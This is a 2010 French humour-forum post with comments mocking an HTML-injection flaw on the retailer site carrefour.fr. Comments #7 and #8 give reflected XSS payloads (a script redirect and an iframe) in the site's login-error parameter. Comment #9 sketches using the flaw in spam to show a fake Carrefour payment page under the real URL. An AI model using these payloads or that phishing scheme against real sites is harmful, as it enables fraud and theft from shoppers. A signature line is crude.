l'asile.fr

5

Avec Carrefour, je positive

de SimOOn , le 30 mars 2010 à 20:51 - (carrefour.fr) - 10 commentaires
Hop, vous aussi faites de l'injection HTML excellente.

Proposer une brève

Détail des votes

Il y a 7 pour et 2 contre. Ce qui fait au total 9 votes.

À lire cette semaine...

groove_salad
#1 hOrny Lettuce

Ha ha, excellent !


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mardi
30 mars 2010, 20:56
 
 

stillcut
#2

Ma vue baisse ?


mardi
30 mars 2010, 22:10
 
 

bloute
#3

Installe linux.


mardi
30 mars 2010, 23:51
 
 

hohun
#4 Comique tripier

Hahaha


mercredi
31 mars 2010, 01:38
 
 

groove_salad
#5 hOrny Lettuce

.


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mercredi
31 mars 2010, 08:19
 
 

gwendal
#6 Détourageophile

Hahahaha :)


- les fautes
mercredi
31 mars 2010, 08:24
 
 

Kane
#7 Satan m'habite

Encore plus fort !

http://www.carrefour.fr/portal/site/carrefour/?loginerror=<script>windows.location.replace("www.lemonparty.org")</script>

Humf, la balise URL foire ...


mercredi
31 mars 2010, 09:24
 
 

Akshell
#8

[url]http://www.carrefour.fr/portal/site/carrefour/?loginerror=%3Ciframe%20src=%22http://www.lemonparty.org%22%20width=%22800%22%20height=%22600%22%3E%3C/iframe%3E[/url]


mercredi
31 mars 2010, 10:14
 
 

Kane
#9 Satan m'habite

haha ouai, la bonne vieille balise iframe!

Il y a moyen d'exploiter ça bien comme il faut : un bon gros SPAM avec un article en promo qui redirige vers la page en question. Sur cette page on fait afficher un faux site carrefour avec la vraie URL dans le navigateur.

Faut juste que l'utilisateur ne capte pas qu'il n'est pas en SSL au moment de payer.


mercredi
31 mars 2010, 10:38
 
 

Akshell
#10

sûrement avec un truc du genre opener.location.replace("www.lemonparty.org") dans l'iframe
j'ai pas trop envie de tester mais ça doit être possible en effet.


mercredi
31 mars 2010, 11:38
 
 


Ajouter un commentaire

Vous devez être identifié pour poster un commentaire.

# 20:01:28
(hohun) 10:01:39 j'ai même pas eu le temps de regarder le doc... ce weekend en guise d'hommage :(
# 10:01:39
(carwin) Bon bah RIP Val :/
# 19:50:46
(hohun) done!
# 13:54:37
(carwin) file moi une adresse mail (via mp)
# 09:33:10
(carwin) 20:13:17 Tu veux que je te le récupère ?
# 20:13:17
(hohun) 13:48:19 pas visible depuis l'espagne :(
# 13:48:19
(carwin) Portrait assez saisissant de Val Kilmer (que je pensais être un gros connard égo-centré) [url]
# 10:30:24
(carwin) 15:13:34 Roger that!
# 18:43:40
(carwin) 21:03:36 Comme tu dis :)
# 21:03:36
(Akshell) arghhh le certificat...
lire la suite de la tribune